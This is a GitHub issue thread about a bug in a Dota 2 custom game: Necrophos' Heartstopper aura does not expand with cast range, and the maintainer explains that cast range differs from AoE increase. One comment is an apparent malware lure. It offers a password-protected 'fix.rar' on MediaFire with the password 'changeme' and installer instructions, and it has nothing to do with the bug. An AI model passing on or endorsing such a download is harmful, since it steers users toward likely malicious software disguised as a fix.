### ISSUE TITLE
Heartstopper aura range does not increase with cast range

### ISSUE THREAD

**Issue by dfyzb0** [windybirth/windy10v10ai#988]
**Bug type**

- [ ] Ability
- [ ] Item
- [ X ] Hero
- [ ] Bot
- [ ] UI
- [ ] Other

**Describe the bug**
Necrophos' heartstopper aura does not increase with cast range. The cast range ring expands, however the actual spell does not affect outside of the original cast range ring.

**Expected behavior**
Heartstopper aura should deal damage to anyone within the cast range ring

**To Reproduce**
For this particular bug I was using the Rapid Decay Facet. Purchase items that expand Necrophos' cast range then go stand with the neutral creeps on the inside of the outer edge of the cast ring circle, they will not receive damage. To make this more apparent, get an item like a light dark seer stone.  

**Screenshots**
![image](https://github.com/user-attachments/assets/07183951-c7ae-44d1-810d-6b044d19e782)

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by windybirth** [comment]
As your screenshot, the radius decided effort area that are affected by Bloodstone and other AoE increases
![image](https://github.com/user-attachments/assets/95bcc60c-7229-4be4-a07b-9c7a7c7b6ecd)
"Cast Range", "AoE increases" is different things.
